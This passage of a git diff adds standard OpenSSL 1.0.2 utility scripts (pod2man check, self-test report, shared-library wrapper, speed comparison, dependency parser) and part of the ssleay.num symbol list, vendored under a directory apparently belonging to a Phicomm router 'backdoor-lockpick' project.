+    "yacute"	=>	"y\\*'",	#   small y, acute accent
+    "yuml"	=>	"y\\*:",	#   small y, dieresis or umlaut mark
+);
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest
new file mode 100755
index 0000000..384e683
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest
@@ -0,0 +1,58 @@
+#!/bin/sh
+
+# This script is used by test/Makefile to check whether a sane 'pod2man'
+# is installed.
+# ('make install' should not try to run 'pod2man' if it does not exist or if
+# it is a broken 'pod2man' version that is known to cause trouble. if we find
+# the system 'pod2man' to be broken, we use our own copy instead)
+#
+# In any case, output an appropriate command line for running (or not
+# running) pod2man.
+
+
+IFS=:
+if test "$OSTYPE" = "msdosdjgpp"; then IFS=";"; fi
+
+try_without_dir=true
+# First we try "pod2man", then "$dir/pod2man" for each item in $PATH.
+for dir in dummy${IFS}$PATH; do
+    if [ "$try_without_dir" = true ]; then
+      # first iteration
+      pod2man=pod2man
+      try_without_dir=false
+    else
+      # second and later iterations
+      pod2man="$dir/pod2man"
+      if [ ! -f "$pod2man" ]; then  # '-x' is not available on Ultrix
+        pod2man=''
+      fi
+    fi
+
+    if [ ! "$pod2man" = '' ]; then
+        failure=none
+
+	if "$pod2man" --section=1 --center=OpenSSL --release=dev pod2mantest.pod | fgrep OpenSSL >/dev/null; then
+	    :
+	else
+	    failure=BasicTest
+	fi
+
+	if [ "$failure" = none ]; then
+	    if "$pod2man" --section=1 --center=OpenSSL --release=dev pod2mantest.pod | grep '^MARKER - ' >/dev/null; then
+	        failure=MultilineTest
+	    fi
+	fi
+
+
+        if [ "$failure" = none ]; then
+            echo "$pod2man"
+            exit 0
+        fi
+
+        echo "$pod2man does not work properly ('$failure' failed).  Looking for another pod2man ..." >&2
+    fi
+done
+
+echo "No working pod2man found.  Consider installing a new version." >&2
+echo "As a workaround, we'll use a bundled old copy of pod2man.pl." >&2
+echo "$1 ../../util/pod2man.pl"
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest.pod
new file mode 100644
index 0000000..5d2539a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest.pod
@@ -0,0 +1,15 @@
+=pod
+
+=head1 NAME
+
+foo, bar,
+MARKER - test of multiline name section
+
+=head1 DESCRIPTION
+
+This is a test .pod file to see if we have a buggy pod2man or not.
+If we have a buggy implementation, we will get a line matching the
+regular expression "^ +MARKER - test of multiline name section *$"
+at the end of the resulting document.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/point.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/point.sh
new file mode 100755
index 0000000..da39899
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/point.sh
@@ -0,0 +1,10 @@
+#!/bin/sh
+
+rm -f "$2"
+if test "$OSTYPE" = msdosdjgpp || test "x$PLATFORM" = xmingw ; then
+    cp "$1" "$2"
+else
+    ln -s "$1" "$2"
+fi
+echo "$2 => $1"
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/selftest.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/selftest.pl
new file mode 100644
index 0000000..7b32e9f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/selftest.pl
@@ -0,0 +1,201 @@
+#!/usr/local/bin/perl -w
+#
+# Run the test suite and generate a report
+#
+
+if (! -f "Configure") {
+    print "Please run perl util/selftest.pl in the OpenSSL directory.\n";
+    exit 1;
+}
+
+my $report="testlog";
+my $os="??";
+my $version="??";
+my $platform0="??";
+my $platform="??";
+my $options="??";
+my $last="??";
+my $ok=0;
+my $cc="cc";
+my $cversion="??";
+my $sep="-----------------------------------------------------------------------------\n";
+my $not_our_fault="\nPlease ask your system administrator/vendor for more information.\n[Problems with your operating system setup should not be reported\nto the OpenSSL project.]\n";
+
+open(OUT,">$report") or die;
+
+print OUT "OpenSSL self-test report:\n\n";
+
+$uname=`uname -a`;
+$uname="??\n" if $uname eq "";
+
+$c=`sh config -t`;
+foreach $_ (split("\n",$c)) {
+    $os=$1 if (/Operating system: (.*)$/);
+    $platform0=$1 if (/Configuring for (.*)$/);
+}
+
+system "sh config" if (! -f "Makefile");
+
+if (open(IN,"<Makefile")) {
+    while (<IN>) {
+	$version=$1 if (/^VERSION=(.*)$/);
+	$platform=$1 if (/^PLATFORM=(.*)$/);
+	$options=$1 if (/^OPTIONS=(.*)$/);
+	$cc=$1 if (/^CC= *(.*)$/);
+    }
+    close(IN);
+} else {
+    print OUT "Error running config!\n";
+}
+
+$cversion=`$cc -v 2>&1`;
+$cversion=`$cc -V 2>&1` if $cversion =~ "[Uu]sage";
+$cversion=`$cc -V |head -1` if $cversion =~ "Error";
+$cversion=`$cc --version` if $cversion eq "";
+$cversion =~ s/Reading specs.*\n//;
+$cversion =~ s/usage.*\n//;
+chomp $cversion;
+
+if (open(IN,"<CHANGES")) {
+    while(<IN>) {
+	if (/\*\) (.{0,55})/ && !/applies to/) {
+	    $last=$1;
+	    last;
+	}
+    }
+    close(IN);
+}
+
+print OUT "OpenSSL version:  $version\n";
+print OUT "Last change:      $last...\n";
+print OUT "Options:          $options\n" if $options ne "";
+print OUT "OS (uname):       $uname";
+print OUT "OS (config):      $os\n";
+print OUT "Target (default): $platform0\n";
+print OUT "Target:           $platform\n";
+print OUT "Compiler:         $cversion\n";
+print OUT "\n";
+
+print "Checking compiler...\n";
+if (open(TEST,">cctest.c")) {
+    print TEST "#include <stdio.h>\n#include <stdlib.h>\n#include <errno.h>\nmain(){printf(\"Hello world\\n\");}\n";
+    close(TEST);
+    system("$cc -o cctest cctest.c");
+    if (`./cctest` !~ /Hello world/) {
+	print OUT "Compiler doesn't work.\n";
+	print OUT $not_our_fault;
+	goto err;
+    }
+    system("ar r cctest.a /dev/null");
+    if (not -f "cctest.a") {
+	print OUT "Check your archive tool (ar).\n";
+	print OUT $not_our_fault;
+	goto err;
+    }
+} else {
+    print OUT "Can't create cctest.c\n";
+}
+if (open(TEST,">cctest.c")) {
+    print TEST "#include <stdio.h>\n#include <stdlib.h>\n#include <openssl/opensslv.h>\nmain(){printf(OPENSSL_VERSION_TEXT);}\n";
+    close(TEST);
+    system("$cc -o cctest -Iinclude cctest.c");
+    $cctest = `./cctest`;
+    if ($cctest !~ /OpenSSL $version/) {
+	if ($cctest =~ /OpenSSL/) {
+	    print OUT "#include uses headers from different OpenSSL version!\n";
+	} else {
+	    print OUT "Can't compile test program!\n";
+	}
+	print OUT $not_our_fault;
+	goto err;
+    }
+} else {
+    print OUT "Can't create cctest.c\n";
+}
+
+print "Running make...\n";
+if (system("make 2>&1 | tee make.log") > 255) {
+
+    print OUT "make failed!\n";
+    if (open(IN,"<make.log")) {
+	print OUT $sep;
+	while (<IN>) {
+	    print OUT;
+	}
+	close(IN);
+	print OUT $sep;
+    } else {
+	print OUT "make.log not found!\n";
+    }
+    goto err;
+}
+
+# Not sure why this is here.  The tests themselves can detect if their
+# particular feature isn't included, and should therefore skip themselves.
+# To skip *all* tests just because one algorithm isn't included is like
+# shooting mosquito with an elephant gun...
+#                   -- Richard Levitte, inspired by problem report 1089
+#
+#$_=$options;
+#s/no-asm//;
+#s/no-shared//;
+#s/no-krb5//;
+#if (/no-/)
+#{
+#    print OUT "Test skipped.\n";
+#    goto err;
+#}
+
+print "Running make test...\n";
+if (system("make test 2>&1 | tee maketest.log") > 255)
+ {
+    print OUT "make test failed!\n";
+} else {
+    $ok=1;
+}
+
+if ($ok and open(IN,"<maketest.log")) {
+    while (<IN>) {
+	$ok=2 if /^platform: $platform/;
+    }
+    close(IN);
+}
+
+if ($ok != 2) {
+    print OUT "Failure!\n";
+    if (open(IN,"<make.log")) {
+	print OUT $sep;
+	while (<IN>) {
+	    print OUT;
+	}
+	close(IN);
+	print OUT $sep;
+    } else {
+	print OUT "make.log not found!\n";
+    }
+    if (open(IN,"<maketest.log")) {
+	while (<IN>) {
+	    print OUT;
+	}
+	close(IN);
+	print OUT $sep;
+    } else {
+	print OUT "maketest.log not found!\n";
+    }
+} else {
+    print OUT "Test passed.\n";
+}
+err:
+close(OUT);
+
+print "\n";
+open(IN,"<$report") or die;
+while (<IN>) {
+    if (/$sep/) {
+	print "[...]\n";
+	last;
+    }
+    print;
+}
+print "\nTest report in file $report\n";
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/shlib_wrap.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/shlib_wrap.sh
new file mode 100755
index 0000000..8775cb5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/shlib_wrap.sh
@@ -0,0 +1,97 @@
+#!/bin/sh
+
+[ $# -ne 0 ] || set -x		# debug mode without arguments:-)
+
+THERE="`echo $0 | sed -e 's|[^/]*$||' 2>/dev/null`.."
+[ -d "${THERE}" ] || exec "$@"	# should never happen...
+
+# Alternative to this is to parse ${THERE}/Makefile...
+LIBCRYPTOSO="${THERE}/libcrypto.so"
+if [ -f "$LIBCRYPTOSO" ]; then
+    while [ -h "$LIBCRYPTOSO" ]; do
+	LIBCRYPTOSO="${THERE}/`ls -l "$LIBCRYPTOSO" | sed -e 's|.*\-> ||'`"
+    done
+    SOSUFFIX=`echo ${LIBCRYPTOSO} | sed -e 's|.*\.so||' 2>/dev/null`
+    LIBSSLSO="${THERE}/libssl.so${SOSUFFIX}"
+fi
+
+SYSNAME=`(uname -s) 2>/dev/null`;
+case "$SYSNAME" in
+SunOS|IRIX*)
+	# SunOS and IRIX run-time linkers evaluate alternative
+	# variables depending on target ABI...
+	rld_var=LD_LIBRARY_PATH
+	case "`(/usr/bin/file "$LIBCRYPTOSO") 2>/dev/null`" in
+	*ELF\ 64*SPARC*|*ELF\ 64*AMD64*)
+		[ -n "$LD_LIBRARY_PATH_64" ] && rld_var=LD_LIBRARY_PATH_64
+		LD_PRELOAD_64="$LIBCRYPTOSO $LIBSSLSO"; export LD_PRELOAD_64
+		preload_var=LD_PRELOAD_64
+		;;
+	# Why are newly built .so's preloaded anyway? Because run-time
+	# .so lookup path embedded into application takes precedence
+	# over LD_LIBRARY_PATH and as result application ends up linking
+	# to previously installed .so's. On IRIX instead of preloading
+	# newly built .so's we trick run-time linker to fail to find
+	# the installed .so by setting _RLD_ROOT variable.
+	*ELF\ 32*MIPS*)
+		#_RLD_LIST="$LIBCRYPTOSO:$LIBSSLSO:DEFAULT"; export _RLD_LIST
+		_RLD_ROOT=/no/such/dir; export _RLD_ROOT
+		eval $rld_var=\"/usr/lib'${'$rld_var':+:$'$rld_var'}'\"
+		preload_var=_RLD_LIST
+		;;
+	*ELF\ N32*MIPS*)
+		[ -n "$LD_LIBRARYN32_PATH" ] && rld_var=LD_LIBRARYN32_PATH
+		#_RLDN32_LIST="$LIBCRYPTOSO:$LIBSSLSO:DEFAULT"; export _RLDN32_LIST
+		_RLDN32_ROOT=/no/such/dir; export _RLDN32_ROOT
+		eval $rld_var=\"/usr/lib32'${'$rld_var':+:$'$rld_var'}'\"
+		preload_var=_RLDN32_LIST
+		;;
+	*ELF\ 64*MIPS*)
+		[ -n "$LD_LIBRARY64_PATH"  ] && rld_var=LD_LIBRARY64_PATH
+		#_RLD64_LIST="$LIBCRYPTOSO:$LIBSSLSO:DEFAULT"; export _RLD64_LIST
+		_RLD64_ROOT=/no/such/dir; export _RLD64_ROOT
+		eval $rld_var=\"/usr/lib64'${'$rld_var':+:$'$rld_var'}'\"
+		preload_var=_RLD64_LIST
+		;;
+	esac
+	eval $rld_var=\"${THERE}'${'$rld_var':+:$'$rld_var'}'\"; export $rld_var
+	unset rld_var
+	;;
+*)	LD_LIBRARY_PATH="${THERE}:$LD_LIBRARY_PATH"	# Linux, ELF HP-UX
+	DYLD_LIBRARY_PATH="${THERE}:$DYLD_LIBRARY_PATH"	# MacOS X
+	SHLIB_PATH="${THERE}:$SHLIB_PATH"		# legacy HP-UX
+	LIBPATH="${THERE}:$LIBPATH"			# AIX, OS/2
+	export LD_LIBRARY_PATH DYLD_LIBRARY_PATH SHLIB_PATH LIBPATH
+	# Even though $PATH is adjusted [for Windows sake], it doesn't
+	# necessarily does the trick. Trouble is that with introduction
+	# of SafeDllSearchMode in XP/2003 it's more appropriate to copy
+	# .DLLs in vicinity of executable, which is done elsewhere...
+	if [ "$OSTYPE" != msdosdjgpp ]; then
+		PATH="${THERE}:$PATH"; export PATH
+	fi
+	;;
+esac
+
+if [ -f "$LIBCRYPTOSO" -a -z "$preload_var" ]; then
+	# Following three lines are major excuse for isolating them into
+	# this wrapper script. Original reason for setting LD_PRELOAD
+	# was to make it possible to pass 'make test' when user linked
+	# with -rpath pointing to previous version installation. Wrapping
+	# it into a script makes it possible to do so on multi-ABI
+	# platforms.
+	case "$SYSNAME" in
+	*BSD|QNX)	LD_PRELOAD="$LIBCRYPTOSO:$LIBSSLSO" ;;	# *BSD, QNX
+	*)	LD_PRELOAD="$LIBCRYPTOSO $LIBSSLSO" ;;	# SunOS, Linux, ELF HP-UX
+	esac
+	_RLD_LIST="$LIBCRYPTOSO:$LIBSSLSO:DEFAULT"	# Tru64, o32 IRIX
+	DYLD_INSERT_LIBRARIES="$LIBCRYPTOSO:$LIBSSLSO"	# MacOS X
+	export LD_PRELOAD _RLD_LIST DYLD_INSERT_LIBRARIES
+fi
+
+cmd="$1${EXE_EXT}"
+shift
+if [ $# -eq 0 ]; then
+	exec "$cmd"	# old sh, such as Tru64 4.x, fails to expand empty "$@"
+else
+	exec "$cmd" "$@"
+fi
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/sp-diff.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/sp-diff.pl
new file mode 100755
index 0000000..9d6c603
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/sp-diff.pl
@@ -0,0 +1,80 @@
+#!/usr/local/bin/perl
+#
+# This file takes as input, the files that have been output from
+# ssleay speed.
+# It prints a table of the relative differences with %100 being 'no difference'
+#
+
+($#ARGV == 1) || die "$0 speedout1 speedout2\n";
+
+%one=&loadfile($ARGV[0]);
+%two=&loadfile($ARGV[1]);
+
+$line=0;
+foreach $a ("md2","md4","md5","sha","sha1","rc4","des cfb","des cbc","des ede3",
+	"idea cfb","idea cbc","rc2 cfb","rc2 cbc","blowfish cbc","cast cbc")
+	{
+	if (defined($one{$a,8}) && defined($two{$a,8}))
+		{
+		print "type              8 byte%    64 byte%   256 byte%  1024 byte%  8192 byte%\n"
+			unless $line;
+		$line++;
+		printf "%-12s ",$a;
+		foreach $b (8,64,256,1024,8192)
+			{
+			$r=$two{$a,$b}/$one{$a,$b}*100;
+			printf "%12.2f",$r;
+			}
+		print "\n";
+		}
+	}
+
+foreach $a	(
+		"rsa  512","rsa 1024","rsa 2048","rsa 4096",
+		"dsa  512","dsa 1024","dsa 2048",
+		)
+	{
+	if (defined($one{$a,1}) && defined($two{$a,1}))
+		{
+		$r1=($one{$a,1}/$two{$a,1})*100;
+		$r2=($one{$a,2}/$two{$a,2})*100;
+		printf "$a bits %%    %6.2f %%    %6.2f\n",$r1,$r2;
+		}
+	}
+
+sub loadfile
+	{
+	local($file)=@_;
+	local($_,%ret);
+
+	open(IN,"<$file") || die "unable to open '$file' for input\n";
+	$header=1;
+	while (<IN>)
+		{
+		$header=0 if /^[dr]sa/;
+		if (/^type/) { $header=0; next; }
+		next if $header;
+		chop;
+		@a=split;
+		if ($a[0] =~ /^[dr]sa$/)
+			{
+			($n,$t1,$t2)=($_ =~ /^([dr]sa\s+\d+)\s+bits\s+([.\d]+)s\s+([.\d]+)/);
+			$ret{$n,1}=$t1;
+			$ret{$n,2}=$t2;
+			}
+		else
+			{
+			$n=join(' ',grep(/[^k]$/,@a));
+			@k=grep(s/k$//,@a);
+			
+			$ret{$n,   8}=$k[0];
+			$ret{$n,  64}=$k[1];
+			$ret{$n, 256}=$k[2];
+			$ret{$n,1024}=$k[3];
+			$ret{$n,8192}=$k[4];
+			}
+		}
+	close(IN);
+	return(%ret);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/speed.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/speed.sh
new file mode 100755
index 0000000..f489706
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/speed.sh
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+#
+# This is a ugly script use, in conjuction with editing the 'b'
+# configuration in the $(TOP)/Configure script which will
+# output when finished a file called speed.log which is the
+# timings of SSLeay with various options turned on or off.
+#
+# from the $(TOP) directory
+# Edit Configure, modifying things to do with the b/bl-4c-2c etc
+# configurations.
+#
+
+make clean
+perl Configure b
+make
+apps/ssleay version -v -b -f >speed.1
+apps/ssleay speed >speed.1l
+
+perl Configure bl-4c-2c
+/bin/rm -f crypto/rc4/*.o crypto/bn/bn*.o crypto/md2/md2_dgst.o
+make
+apps/ssleay speed rc4 rsa md2 >speed.2l
+
+perl Configure bl-4c-ri
+/bin/rm -f crypto/rc4/rc4*.o
+make
+apps/ssleay speed rc4 >speed.3l
+
+perl Configure b2-is-ri-dp
+/bin/rm -f crypto/idea/i_*.o crypto/rc4/*.o crypto/des/ecb_enc.o crypto/bn/bn*.o
+apps/ssleay speed rsa rc4 idea des >speed.4l
+
+cat speed.1 >speed.log
+cat speed.1l >>speed.log
+perl util/sp-diff.pl speed.1l speed.2l >>speed.log
+perl util/sp-diff.pl speed.1l speed.3l >>speed.log
+perl util/sp-diff.pl speed.1l speed.4l >>speed.log
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/src-dep.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/src-dep.pl
new file mode 100755
index 0000000..ad997e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/src-dep.pl
@@ -0,0 +1,147 @@
+#!/usr/local/bin/perl
+
+# we make up an array of
+# $file{function_name}=filename;
+# $unres{filename}="func1 func2 ...."
+$debug=1;
+#$nm_func="parse_linux";
+$nm_func="parse_solaris";
+
+foreach (@ARGV)
+	{
+	&$nm_func($_);
+	}
+
+foreach $file (sort keys %unres)
+	{
+	@a=split(/\s+/,$unres{$file});
+	%ff=();
+	foreach $func (@a)
+		{
+		$f=$file{$func};
+		$ff{$f}=1 if $f ne "";
+		}
+
+	foreach $a (keys %ff)
+		{ $we_need{$file}.="$a "; }
+	}
+
+foreach $file (sort keys %we_need)
+	{
+#	print "	$file $we_need{$file}\n";
+	foreach $bit (split(/\s+/,$we_need{$file}))
+		{ push(@final,&walk($bit)); }
+
+	foreach (@final) { $fin{$_}=1; }
+	@final="";
+	foreach (sort keys %fin)
+		{ push(@final,$_); }
+
+	print "$file: @final\n";
+	}
+
+sub walk
+	{
+	local($f)=@_;
+	local(@a,%seen,@ret,$r);
+
+	@ret="";
+	$f =~ s/^\s+//;
+	$f =~ s/\s+$//;
+	return "" if ($f =~ "^\s*$");
+
+	return(split(/\s/,$done{$f})) if defined ($done{$f});
+
+	return if $in{$f} > 0;
+	$in{$f}++;
+	push(@ret,$f);
+	foreach $r (split(/\s+/,$we_need{$f}))
+		{
+		push(@ret,&walk($r));
+		}
+	$in{$f}--;
+	$done{$f}=join(" ",@ret);
+	return(@ret);
+	}
+
+sub parse_linux
+	{
+	local($name)=@_;
+
+	open(IN,"nm $name|") || die "unable to run 'nn $name':$!\n";
+	while (<IN>)
+		{
+		chop;
+		next if /^\s*$/;
+		if (/^[^[](.*):$/)
+			{
+			$file=$1;
+			$file="$1.c" if /\[(.*).o\]/;
+			print STDERR "$file\n";
+			$we_need{$file}=" ";
+			next;
+			}
+
+		@a=split(/\s*\|\s*/);
+		next unless $#a == 7;
+		next unless $a[4] eq "GLOB";
+		if ($a[6] eq "UNDEF")
+			{
+			$unres{$file}.=$a[7]." ";
+			}
+		else
+			{
+			if ($file{$a[7]} ne "")
+				{
+				print STDERR "duplicate definition of $a[7],\n$file{$a[7]} and $file \n";
+				}
+			else
+				{
+				$file{$a[7]}=$file;
+				}
+			}
+		}
+	close(IN);
+	}
+
+sub parse_solaris
+	{
+	local($name)=@_;
+
+	open(IN,"nm $name|") || die "unable to run 'nn $name':$!\n";
+	while (<IN>)
+		{
+		chop;
+		next if /^\s*$/;
+		if (/^(\S+):$/)
+			{
+			$file=$1;
+			#$file="$1.c" if $file =~ /^(.*).o$/;
+			print STDERR "$file\n";
+			$we_need{$file}=" ";
+			next;
+			}
+		@a=split(/\s*\|\s*/);
+		next unless $#a == 7;
+		next unless $a[4] eq "GLOB";
+		if ($a[6] eq "UNDEF")
+			{
+			$unres{$file}.=$a[7]." ";
+			print STDERR "$file needs $a[7]\n" if $debug;
+			}
+		else
+			{
+			if ($file{$a[7]} ne "")
+				{
+				print STDERR "duplicate definition of $a[7],\n$file{$a[7]} and $file \n";
+				}
+			else
+				{
+				$file{$a[7]}=$file;
+				print STDERR "$file has $a[7]\n" if $debug;
+				}
+			}
+		}
+	close(IN);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ssleay.num b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ssleay.num
new file mode 100755
index 0000000..5a89913
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ssleay.num
@@ -0,0 +1,370 @@
+ERR_load_SSL_strings                    1	EXIST::FUNCTION:
+SSL_CIPHER_description                  2	EXIST::FUNCTION:
+SSL_CTX_add_client_CA                   3	EXIST::FUNCTION:
+SSL_CTX_add_session                     4	EXIST::FUNCTION:
+SSL_CTX_check_private_key               5	EXIST::FUNCTION:
+SSL_CTX_ctrl                            6	EXIST::FUNCTION:
+SSL_CTX_flush_sessions                  7	EXIST::FUNCTION:
+SSL_CTX_free                            8	EXIST::FUNCTION:
+SSL_CTX_get_client_CA_list              9	EXIST::FUNCTION:
+SSL_CTX_get_verify_callback             10	EXIST::FUNCTION:
+SSL_CTX_get_verify_mode                 11	EXIST::FUNCTION:
+SSL_CTX_new                             12	EXIST::FUNCTION:
+SSL_CTX_remove_session                  13	EXIST::FUNCTION:
+SSL_CTX_set_cipher_list                 15	EXIST::FUNCTION:
+SSL_CTX_set_client_CA_list              16	EXIST::FUNCTION:
+SSL_CTX_set_default_passwd_cb           17	EXIST::FUNCTION:
+SSL_CTX_set_ssl_version                 19	EXIST::FUNCTION:
+SSL_CTX_set_verify                      21	EXIST::FUNCTION:
+SSL_CTX_use_PrivateKey                  22	EXIST::FUNCTION:
+SSL_CTX_use_PrivateKey_ASN1             23	EXIST::FUNCTION:
+SSL_CTX_use_PrivateKey_file             24	EXIST::FUNCTION:STDIO
+SSL_CTX_use_RSAPrivateKey               25	EXIST::FUNCTION:RSA
+SSL_CTX_use_RSAPrivateKey_ASN1          26	EXIST::FUNCTION:RSA
+SSL_CTX_use_RSAPrivateKey_file          27	EXIST::FUNCTION:RSA,STDIO
+SSL_CTX_use_certificate                 28	EXIST::FUNCTION:
+SSL_CTX_use_certificate_ASN1            29	EXIST::FUNCTION:
+SSL_CTX_use_certificate_file            30	EXIST::FUNCTION:STDIO
+SSL_SESSION_free                        31	EXIST::FUNCTION:
+SSL_SESSION_new                         32	EXIST::FUNCTION:
+SSL_SESSION_print                       33	EXIST::FUNCTION:BIO
+SSL_SESSION_print_fp                    34	EXIST::FUNCTION:FP_API
+SSL_accept                              35	EXIST::FUNCTION:
+SSL_add_client_CA                       36	EXIST::FUNCTION:
+SSL_alert_desc_string                   37	EXIST::FUNCTION:
+SSL_alert_desc_string_long              38	EXIST::FUNCTION:
+SSL_alert_type_string                   39	EXIST::FUNCTION:
+SSL_alert_type_string_long              40	EXIST::FUNCTION:
+SSL_check_private_key                   41	EXIST::FUNCTION:
+SSL_clear                               42	EXIST::FUNCTION:
+SSL_connect                             43	EXIST::FUNCTION:
+SSL_copy_session_id                     44	EXIST::FUNCTION:
+SSL_ctrl                                45	EXIST::FUNCTION:
+SSL_dup                                 46	EXIST::FUNCTION:
+SSL_dup_CA_list                         47	EXIST::FUNCTION:
+SSL_free                                48	EXIST::FUNCTION:
+SSL_get_certificate                     49	EXIST::FUNCTION:
+SSL_get_cipher_list                     52	EXIST::FUNCTION:
+SSL_get_ciphers                         55	EXIST::FUNCTION:
+SSL_get_client_CA_list                  56	EXIST::FUNCTION:
+SSL_get_default_timeout                 57	EXIST::FUNCTION:
+SSL_get_error                           58	EXIST::FUNCTION:
+SSL_get_fd                              59	EXIST::FUNCTION:
+SSL_get_peer_cert_chain                 60	EXIST::FUNCTION:
+SSL_get_peer_certificate                61	EXIST::FUNCTION:
+SSL_get_rbio                            63	EXIST::FUNCTION:BIO
+SSL_get_read_ahead                      64	EXIST::FUNCTION:
+SSL_get_shared_ciphers                  65	EXIST::FUNCTION:
+SSL_get_ssl_method                      66	EXIST::FUNCTION:
+SSL_get_verify_callback                 69	EXIST::FUNCTION:
+SSL_get_verify_mode                     70	EXIST::FUNCTION:
+SSL_get_version                         71	EXIST::FUNCTION:
+SSL_get_wbio                            72	EXIST::FUNCTION:BIO
+SSL_load_client_CA_file                 73	EXIST::FUNCTION:STDIO
+SSL_load_error_strings                  74	EXIST::FUNCTION:
+SSL_new                                 75	EXIST::FUNCTION:
+SSL_peek                                76	EXIST::FUNCTION:
+SSL_pending                             77	EXIST::FUNCTION:
+SSL_read                                78	EXIST::FUNCTION:
+SSL_renegotiate                         79	EXIST::FUNCTION:
+SSL_rstate_string                       80	EXIST::FUNCTION:
+SSL_rstate_string_long                  81	EXIST::FUNCTION:
+SSL_set_accept_state                    82	EXIST::FUNCTION:
+SSL_set_bio                             83	EXIST::FUNCTION:BIO
+SSL_set_cipher_list                     84	EXIST::FUNCTION:
+SSL_set_client_CA_list                  85	EXIST::FUNCTION:
+SSL_set_connect_state                   86	EXIST::FUNCTION:
+SSL_set_fd                              87	EXIST::FUNCTION:SOCK
+SSL_set_read_ahead                      88	EXIST::FUNCTION:
+SSL_set_rfd                             89	EXIST::FUNCTION:SOCK
+SSL_set_session                         90	EXIST::FUNCTION:
+SSL_set_ssl_method                      91	EXIST::FUNCTION:
+SSL_set_verify                          94	EXIST::FUNCTION:
+SSL_set_wfd                             95	EXIST::FUNCTION:SOCK
+SSL_shutdown                            96	EXIST::FUNCTION:
+SSL_state_string                        97	EXIST::FUNCTION:
+SSL_state_string_long                   98	EXIST::FUNCTION:
+SSL_use_PrivateKey                      99	EXIST::FUNCTION:
+SSL_use_PrivateKey_ASN1                 100	EXIST::FUNCTION:
+SSL_use_PrivateKey_file                 101	EXIST::FUNCTION:STDIO
+SSL_use_RSAPrivateKey                   102	EXIST::FUNCTION:RSA
+SSL_use_RSAPrivateKey_ASN1              103	EXIST::FUNCTION:RSA
+SSL_use_RSAPrivateKey_file              104	EXIST::FUNCTION:RSA,STDIO
+SSL_use_certificate                     105	EXIST::FUNCTION:
+SSL_use_certificate_ASN1                106	EXIST::FUNCTION:
+SSL_use_certificate_file                107	EXIST::FUNCTION:STDIO
+SSL_write                               108	EXIST::FUNCTION:
+SSLeay_add_ssl_algorithms               109	NOEXIST::FUNCTION:
+SSLv23_client_method                    110	EXIST::FUNCTION:RSA
+SSLv23_method                           111	EXIST::FUNCTION:RSA
+SSLv23_server_method                    112	EXIST::FUNCTION:RSA
+SSLv2_client_method                     113	EXIST::FUNCTION:RSA,SSL2
+SSLv2_method                            114	EXIST::FUNCTION:RSA,SSL2
+SSLv2_server_method                     115	EXIST::FUNCTION:RSA,SSL2
+SSLv3_client_method                     116	EXIST::FUNCTION:SSL3_METHOD
+SSLv3_method                            117	EXIST::FUNCTION:SSL3_METHOD
+SSLv3_server_method                     118	EXIST::FUNCTION:SSL3_METHOD
+d2i_SSL_SESSION                         119	EXIST::FUNCTION:
+i2d_SSL_SESSION                         120	EXIST::FUNCTION:
+BIO_f_ssl                               121	EXIST::FUNCTION:BIO
+BIO_new_ssl                             122	EXIST::FUNCTION:BIO
+BIO_proxy_ssl_copy_session_id           123	NOEXIST::FUNCTION:
+BIO_ssl_copy_session_id                 124	EXIST::FUNCTION:BIO
+SSL_do_handshake                        125	EXIST::FUNCTION:
+SSL_get_privatekey                      126	EXIST::FUNCTION:
+SSL_get_current_cipher                  127	EXIST::FUNCTION:
+SSL_CIPHER_get_bits                     128	EXIST::FUNCTION:
+SSL_CIPHER_get_version                  129	EXIST::FUNCTION:
+SSL_CIPHER_get_name                     130	EXIST::FUNCTION:
+BIO_ssl_shutdown                        131	EXIST::FUNCTION:BIO
+SSL_SESSION_cmp                         132	NOEXIST::FUNCTION:
+SSL_SESSION_hash                        133	NOEXIST::FUNCTION:
+SSL_SESSION_get_time                    134	EXIST::FUNCTION:
+SSL_SESSION_set_time                    135	EXIST::FUNCTION:
+SSL_SESSION_get_timeout                 136	EXIST::FUNCTION:
+SSL_SESSION_set_timeout                 137	EXIST::FUNCTION:
+SSL_CTX_get_ex_data                     138	EXIST::FUNCTION:
+SSL_CTX_get_quiet_shutdown              140	EXIST::FUNCTION:
+SSL_CTX_load_verify_locations           141	EXIST::FUNCTION:
